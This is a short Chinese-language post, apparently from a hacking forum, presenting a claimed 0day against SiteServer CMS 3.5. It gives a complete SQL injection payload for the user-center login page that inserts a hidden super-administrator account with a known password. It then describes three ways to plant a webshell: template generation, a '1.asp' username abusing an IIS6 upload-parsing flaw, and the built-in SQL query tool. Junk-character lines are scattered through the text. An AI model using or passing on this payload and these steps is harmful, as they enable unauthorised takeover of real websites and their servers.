SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
2 W* u# w3 _! T- G) _0 c
( p. B$ `# I0 w/ rstieserver官网:www.siteserver.cn


4 ^* W4 z. L$ {/ U4 o6 i
EXP:
; U. {0 K# N6 ]) [) g* l
. ^2 f* \( ]8 Q; ~; ^直接访问UserCenter/login.aspx
3 c% `4 T3 A; O: Q) g, K9 b+ ?
# t/ q$ q1 H# K5 F- @7 `1 B

用户名处输入：

8 a  I) g3 j9 Y1 g! Z123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
. d% s& Z, N# m# B9 ^% ^$ K


/ z; I2 s, r& |密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
  W$ D. V" d2 a4 v8 z
+ N* J% k+ J* i* h6 T* F6 }

% t2 a) f- P( @) n* x之后再访问后台SiteServer/login.aspx用插入的用户登陆

& F- q: N; W7 q" {

0 g0 {' k  B7 J后台拿webshell的三种方法：

$ o* t2 J- ?; v  k, B* o一、
4 [- q% w8 `) o( R& W) ~
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

8 H- Z* ?# @" L: i) _. |! F1 Z4 ^二、
. F7 S% @/ |/ s- ~4 C5 I
成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

1 n# e# z) ~1 |  U2 W& f（ps：后台添加用户时不会验证是否含有非法字符）

三、

  t. k8 ]5 w( D6 c系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
9 x) ^9 Z3 [. G% h
! |  R. T5 G( R系统工具-》数据库工具-》SQL语句查询
( r, t0 Y6 c. m7 [这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。